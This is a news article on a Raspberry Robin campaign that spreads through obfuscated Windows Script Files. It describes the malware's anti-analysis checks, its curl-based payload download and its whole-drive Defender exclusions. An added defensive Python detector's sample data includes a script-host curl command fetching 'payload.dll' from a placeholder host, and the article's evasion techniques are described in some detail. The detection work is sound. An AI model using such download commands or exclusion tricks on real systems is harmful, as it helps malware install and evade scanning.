Cybersecurity researchers have discovered a new Raspberry Robin campaign wave that has been propagating the malware through malicious Windows Script Files (WSFs) since March 2024.
"Historically, Raspberry Robin was known to spread through removable media like USB drives, but over time its distributors have experimented with other initial infection vectors," HP Wolf Security researcher Patrick Schläpfer said in a report shared with The Hacker News.
Raspberry Robin, also called QNAP worm, was first spotted in September 2021 and has since evolved into a downloader for various other payloads in recent years, such as SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, in addition to serving as a precursor for ransomware.
While the malware was initially distributed by means of USB devices containing LNK files that retrieved the payload from a compromised QNAP device, it has since adopted other methods such as social engineering and malvertising.
It is attributed to an emerging threat cluster tracked by Microsoft as Storm-0856, which has links to the broader cybercrime ecosystem comprising groups like Evil Corp, Silence, and TA505.
The latest distribution vector involves the use of WSF files that are offered for download via various domains and subdomains.
It is currently not clear how the attackers are directing victims to these URLs, although it is suspected that it could be through either spam or malvertising campaigns.
The heavily obfuscated WSF file functions as a downloader that retrieves the main DLL payload from a remote server using the curl command, but not before a series of anti-analysis and anti-virtual-machine checks are carried out to determine whether it is running in a virtualized environment.
It is also designed to terminate execution if the build number of the Windows operating system is lower than 17063 (released in December 2017, and the first Windows 10 build to ship curl.exe, which the downloader depends on) or if the list of running processes includes antivirus processes associated with Avast, Avira, Bitdefender, Check Point, ESET, and Kaspersky.
What's more, it configures Microsoft Defender Antivirus exclusion rules in an effort to sidestep detection by adding the entire main drive to the exclusion list, preventing it from being scanned.
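Two of the behaviours described above leave traces a defender can hunt for without a signature for the script itself: a Defender configuration-change event (Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log) whose new value is a path exclusion covering a whole drive root, and a process-creation record in which a Windows script host launches curl.exe. The following is an added example of that detection logic; it is not code from HP Wolf Security or from the malware. It assumes the 5007 message text follows Defender's usual "New value: HKLM\...\Exclusions\Paths\<path> = 0x0" format, and both sample inputs (event messages and Sysmon-style process records) are constructed for the example.

```python
"""Detect whole-drive Defender exclusions and script-host -> curl.exe chains.

Added example, not HP's or the malware's code. The Event ID 5007 messages and
the process records below are constructed; real telemetry would come from the
Defender Operational event log and Sysmon Event ID 1 (or equivalent EDR data).
"""
import re

# "New value:" of a 5007 event that adds a path exclusion. Defender records the
# exclusion as a registry value under Exclusions\Paths with data 0x0.
EXCLUSION_RE = re.compile(
    r"New value:\s*HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\"
    r"(?P<path>.+?)\s*=\s*0x0",
    re.IGNORECASE,
)
# A bare drive letter, with or without a trailing backslash or wildcard: C:, C:\, C:\*
DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?\*?$")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def excluded_path(message: str):
    """Path added by a 5007 exclusion change, or None if the event is something else."""
    m = EXCLUSION_RE.search(message)
    return m.group("path").strip() if m else None


def is_drive_root(path: str) -> bool:
    """True when an exclusion path covers an entire drive rather than a folder."""
    return bool(DRIVE_ROOT_RE.match(path.strip()))


def find_drive_root_exclusions(messages):
    """Paths from 5007 events that exclude a whole drive from scanning."""
    hits = []
    for msg in messages:
        path = excluded_path(msg)
        if path is not None and is_drive_root(path):
            hits.append(path)
    return hits


def basename(image: str) -> str:
    """Lower-cased file name of an image path (handles both slash styles)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_script_host_curl(records):
    """Process-creation records where wscript.exe/cscript.exe launched curl.exe."""
    return [
        r for r in records
        if basename(r["ParentImage"]) in SCRIPT_HOSTS and basename(r["Image"]) == "curl.exe"
    ]


# Constructed 5007 messages: a folder exclusion (benign), a whole-drive exclusion
# (the behaviour described in the article), and an unrelated setting change.
SAMPLE_5007 = [
    r"Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value:  New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\BuildAgent = 0x0",
    r"Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value:  New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = 0x0",
    r"Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = 0x1",
]

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
# The domain and file names are invented placeholders.
SAMPLE_PROCS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\Public\payload.dll https://example.invalid/get"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -O https://example.invalid/readme.txt"},
]

if __name__ == "__main__":
    print("whole-drive exclusions:", find_drive_root_exclusions(SAMPLE_5007))
    for r in find_script_host_curl(SAMPLE_PROCS):
        print("script host spawned curl:", r["CommandLine"])
```

Neither rule depends on the obfuscated script content that VirusTotal engines miss; both key on side effects the downloader cannot avoid if it is to work (the exclusion change and the curl child process). On a live host, `Get-MpPreference` in PowerShell lists the current `ExclusionPath` values if you want to confirm a finding from the event log.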
"The scripts themselves are currently not classified as malicious by any anti-virus scanners on VirusTotal, demonstrating the evasiveness of the malware and the risk of it causing a serious infection with Raspberry Robin," HP said.
"The WSF downloader is heavily obfuscated and uses many anti-analysis techniques, enabling the malware to evade detection and slow down analysis."